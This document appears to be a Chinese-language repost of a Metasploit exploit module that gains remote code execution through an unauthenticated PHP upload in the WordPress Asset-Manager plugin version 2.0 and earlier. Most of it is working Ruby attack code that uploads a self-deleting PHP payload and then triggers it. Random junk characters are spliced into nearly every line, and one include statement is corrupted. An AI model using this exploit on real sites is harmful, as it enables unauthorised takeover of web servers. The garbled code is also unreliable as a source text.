这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 n c1 B0 K. Y
. d3 @0 X3 E5 b- C. m2 B- P2 k
##
# K9 H! J) ?6 A% `" j$ L* h# This file is part of the Metasploit Framework and may be subject to
4 S# z! ^ s' J; |+ y$ a# redistribution and commercial restrictions. Please see the Metasploit
( Q5 C6 Y' j) f x& }, U# @# Framework web site for more information on licensing and terms of use.
1 M& ]& Z% K# B# http://metasploit.com/framework/
9 m9 [) }; @% T, n6 ]6 g##5 K+ Y7 |% z# V+ V" h& s9 |, n
2 Q3 T+ N5 O5 j. v& m, q' m( f' p
require 'msf/core'
4 C* z: L1 n) ]( r, }7 F( E2 C Drequire 'msf/core/exploit/php_exe'
- Z+ q1 y8 Q9 t, J. P* L; Z , B4 ^- H, V5 L* t- V h
class Metasploit3 < Msf::Exploit::Remote& e& `& v6 N9 }1 L5 ?( ?& @
Rank = ExcellentRanking2 v1 O3 S1 i& I( ?- n( W& z
7 y3 m5 u' S3 q4 L' u7 }8 A% Q" z include Msf::Exploit::Remote::HttpClient- b5 g; X; W$ h1 ^# j$ [1 B6 d
include Msf::Exploit: hpEXE5 e, T, b* @3 X2 G, a$ v. p+ i6 z
/ c! V9 ?( ?6 b7 H' p7 Y def initialize(info = {})
% G3 a4 c; D+ b. i# E: ? super(update_info(info,1 M- h2 x5 a5 q0 A5 Y3 O" B! T1 `4 Y
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
b5 d$ |2 y; e 'Description' => %q{* H- o5 b& T6 M
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress" H, F7 v& y% p; v: [) \
plugin. By abusing the upload.php file, a malicious user can upload a file to a
$ E# Z0 h2 B. g temp directory without authentication, which results in arbitrary code execution., f+ m7 A0 `5 U0 {8 |& I; |: |
},
: Q* ?! N- p* j& U, [3 O 'Author' =>) W K- h4 X: J1 p1 i
[
& G0 I. O1 c% s. D! [1 c 'Sammy FORGIT', # initial discovery; ?$ t( n; W# t4 I. ~& x% }
'James Fitts <fitts.james[at]gmail.com>' # metasploit module* h3 g8 S! W D" r
],
) k7 I( i j) \% M 'License' => MSF_LICENSE,6 W; m; u! q/ `' S$ l9 f+ U9 r! ^
'References' =>
4 y1 E' y" s+ P [
; j2 w3 h+ I. Z& { [ 'OSVDB', '82653' ],) ~9 P9 R% U4 r/ s( w
[ 'BID', '53809' ],
, _; f- Q6 v; F k, {3 y [ 'EDB', '18993' ],! _0 r: q) V0 r: N3 ]/ R
[ 'URL', 'http:// www.myhack58.com /' ]% Y! E1 _/ U9 D5 B3 Q
],
3 [4 j4 y1 G: T6 R) u# ]8 t 'Payload' =>8 v5 o1 ]/ ~" R8 [6 i( Q
{
, G7 R, i- D3 [* L3 e' } 'BadChars' => "\x00",
% P$ p% {7 m, ~- t4 I },
! x5 s6 J9 L. f f& J# v* A 'Platform' => 'php',
" G' i T/ B3 I 'Arch' => ARCH_PHP,
3 ?: n8 K9 A4 ]/ a, o' D% g 'Targets' =>
; ~$ V, }2 z4 s2 @3 [5 t [8 u0 h% b& h3 O
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],$ D# w: V4 x' Q( y) `
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 Q0 c3 y/ N1 x* J* o ],9 ~5 N2 I$ P4 K+ ]* q4 ?0 \) z
'DefaultTarget' => 0,
3 q3 h% _; c8 z/ K 'DisclosureDate' => 'May 26 2012'))
9 n2 N4 o8 j# {7 N, z 7 k% p% J; F# L1 I
register_options(
, c, s+ n7 z4 W) e/ G [( d/ j, ?: \4 j8 m/ @' R
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])' }$ F" r) H, K8 ~
], self.class)
& v9 G2 o+ c7 y/ F& m end2 V" S" b8 R9 G, S
. @* u( d( f6 ?/ |' A& s, g% i def exploit
1 l2 s+ ^* R9 c- ~ uri = target_uri.path
3 v7 l* D/ \# K; } uri << '/' if uri[-1,1] != '/'
3 D$ T2 f" |+ Q/ R# y. q peer = "#{rhost}:#{rport}"
4 f( @1 ^0 y) c& O& A E; | payload_name = "#{rand_text_alpha(5)}.php"; N8 I% [* V) E' ~/ k" Y
php_payload = get_write_exec_payload(:unlink_self=>true)
1 i! k1 _' K+ A4 C9 P/ o 3 T: P) g$ w! C2 `2 i
data = Rex::MIME::Message.new
* B X7 T( t# |+ X data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
4 A) i( ?; h8 ?& V% t8 B" B4 v post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')2 `; s% _$ D1 ~3 X. d, T
5 N/ c. z4 L, O1 [# d( x0 [ print_status("#{peer} - Uploading payload #{payload_name}")9 c' I% ^0 j. y0 I3 T/ |) o
res = send_request_cgi({$ W8 T5 [3 n1 i6 B
'method' => 'POST',
( |# }. Q! x" p4 a! l 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
3 P( D& T# k. j& t2 ~* `# x+ n% N 'ctype' => "multipart/form-data; boundary=#{data.bound}",
C9 Y. f6 f. S) {' { 'data' => post_data
3 o2 [& s) e- |: O/ ~4 l- v' F })! h; S( h# }% {
$ Z* s- s X! Z o) V7 G( I1 m if not res or res.code != 200 or res.body !~ /#{payload_name}/
+ P) z# n7 S- r' K" G fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
5 @/ Q, F4 Y. `' Z9 Send% m$ F/ p* u% m# [$ E7 g
4 l- M: V# Z4 F! Q print_status("#{peer} - Executing payload #{payload_name}"): e0 I# ?4 L, P4 L$ E, ?5 ]) y
res = send_request_raw({, m# k7 O2 E0 n, Q3 b4 s( W2 L
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
3 ?+ q2 q2 w7 L+ b$ l 'method' => 'GET'
6 {, d, ], s4 ?) i- l2 y- g- a7 N })' C0 ^5 p+ X+ O9 U g# e( w1 ?
4 D. b/ ], O, X5 K( [ if res and res.code != 200
$ g4 j8 [1 u6 l% M+ H" Q! m/ j fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")0 w5 l. M" u2 P" E6 c/ \8 |0 z
end
/ ^" E- v- x5 U. o end# x! k2 g. O" L" R' C" L( @1 q
end
7 |7 [# I7 f# Z |